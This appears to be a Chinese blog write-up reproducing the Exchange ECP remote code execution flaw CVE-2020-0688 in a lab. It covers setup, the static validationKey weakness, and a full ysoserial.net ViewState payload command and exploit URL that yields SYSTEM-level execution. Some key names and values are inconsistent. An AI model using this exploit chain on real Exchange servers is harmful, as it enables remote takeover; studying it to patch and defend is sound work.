微软Exchange服务远程代码执行漏洞复现（CVE-2020-0688）

环境搭建

使用Windows Server 2008安装Exchange Server 2013

打开ad用户和计算机，选择users添加域用户
创建完成后更改域
输入刚刚添加的用户，之后重启计算机
使用刚才添加的用户登录后安装其他必备组件
管理员启动powershell
Import-Module ServerManager
Add-WindowsFeature RSAT-ADDS
安装完成后重启计算机，使用管理员权限打开powershell
Import-Module ServerManager
Add-WindowsFeature NET-Framework, ADLDS
安装.Net 4.5

安装完成

漏洞详情
具体来说，漏洞是在Exchange Control Panel （ECP）组件中发现的。这个漏洞的性质非常简单。与每次软件安装都会产生随机密钥不同，所有Microsoft Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据。客户端通过__VIEWSTATE请求参数将这些数据返回给服务器。

由于使用了静态密钥，经过身份验证的攻击者可以欺骗目标服务器反序列化恶意创建的ViewState数据。在YSoSerial.net的帮助下，攻击者可以在Exchange Control Panel web应用上执行任意.net代码。

为了利用这个漏洞，我们需要从经过身份验证的session中收集ViewStateUserKey和__VIEWSTATEGENERATOR值。ViewStateUserKey可以从ASP.NET的_SessionIDcookie中获取，而ViewStateUserKey可以在一个隐藏字段中找到。所有这些都可以通过浏览器中的工具轻松找到。
首先，进入192.168.92.128/ecp页面并登录。所使用的帐户不需要任何高权限
接下来，打开浏览器开发工具的Network选项，然后按F5重新发送请求。在页面源代码中可以找到 __VIEWSTATEGENERATOR，它的值是B97B4E27

然后，打开Headers选项卡并找到ASP.NET_SessionId=40c8e078-dc79-4001-9a52-de175b38a028
现在获得了攻击所需要的全部信息：
–validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
–validationalg = SHA1
–generator = B97B4E27
–viewstateuserkey = c1187666-c0ae-4f61-95d4-d2f5348d4300
下一步是使用ysoserial.net生成ViewState的paylaod。通过创建文件C:\TideSec.txt来演示远程代码执行：
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c “cmd /c echo test > C:\TideSec.txt” –validationalg=”SHA1″ –validationkey=”CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF” –generator=”B97B4E27″ –viewstateuserkey=”c1187666-c0ae-4f61-95d4-d2f5348d4300″ –isdebug –islegacy
将输出结果进行URL编码并构造如下URL：
https://192.168.92.128/ecp/default.aspx?VIEWSTATEGENERATOR=&VIEWSTATE=

浏览器内提交地址进行访问，回显500错误，但实际已经创建成功，并且可以看到是具有SYSTEM”权限的进程创建的。这表明攻击者可以以“SYSTEM”身份远程执行代码，完全破坏Exchange服务器。